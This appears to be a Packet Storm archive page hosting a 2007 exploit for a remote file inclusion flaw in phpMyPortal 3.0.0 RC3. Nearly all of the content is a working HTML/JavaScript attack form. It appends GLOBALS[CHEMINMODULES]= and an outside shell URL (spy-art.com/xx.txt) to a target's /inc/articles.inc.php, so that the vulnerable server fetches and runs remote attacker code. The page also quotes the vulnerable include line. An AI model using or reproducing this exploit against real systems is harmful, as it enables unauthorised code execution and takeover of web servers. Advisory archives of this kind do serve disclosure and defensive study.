exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpmyportal-rfi.txt

phpmyportal-rfi.txt
Posted May 10, 2007
Authored by GolD_M | Site tryag.cc

phpMyPortal version 3.0.0 RC3 GLOBALS[CHEMINMODULES] remote file inclusion exploit.

tags | exploit, remote, code execution, file inclusion
SHA-256 | dfde14a67e2860d59250d6bd29b8c60862dc1a1a60864b7c884b81ee16e20407

phpmyportal-rfi.txt

Change Mirror Download
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>phpMyPortal 3.0.0 RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</title>

<script language="JavaScript">

//'===============================================================================================
//'[Script Name: phpMyPortal (22 acc.s) (Version 3.0.0 RC3 du 05/05/2007)
//'[Ex : [Path_Script]/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=Shell
//'[Author : Mahmood_ali
//'[S.Page : http://phpmyportal.info/menu.php <= Click T.l.chargez phpMyPortal
//'[$$ : Free
//'===============================================================================================

//'[[V.Code]]------------------------------------------------------
//'
//'require_once($GLOBALS['CHEMINMODULES'].'/forum/inc/nouvelle.inc.php');
//'
//'[[V.Code]]---------------------------------------------------------

//# Tryag.Com
//# ...



//Basic exploit,but any time : (
var path="/inc/"
var adres="/articles.inc.php?" //File name
var acik ="GLOBALS[CHEMINMODULES]=" // Line 67
var shell="http://www.spy-art.com/xx.txt?" // Shell Tryag-Team

function command(){
if (document.rfi.target1.value==""){
alert("Failed..");
return false;
}



rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
rfi.submit(); // Form Submit
}
</script>

</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Arial" size="2" color="#FFFFFF">phpMyPortal 3.0.0
RC3(GLOBALS[CHEMINMODULES])Remote File Include Exploit</font></b></p>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<b><font face="Tahoma" size="1" color="#FF0000">Target:</font><font face="Tahoma" size="1" color="#FFFF00">[http://[target]/[scriptpath]</font><font color="#00FF00" size="2" face="Tahoma">
</font><font color="#FF0000" size="2">&nbsp;</font></b>
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Gonder" name="B1"><input type="reset" value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>

<b><font face="Lucida Handwriting" size="5" color="#FF0000">Mahmood_ali</font></b><p>
<b><a href="http://tryag.com/cc">
<font face="Lucida Handwriting" size="5" color="#FFFFFF">Tryag.-Team</font></a></b></p>
</p>
</center>
</body>

</html>

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close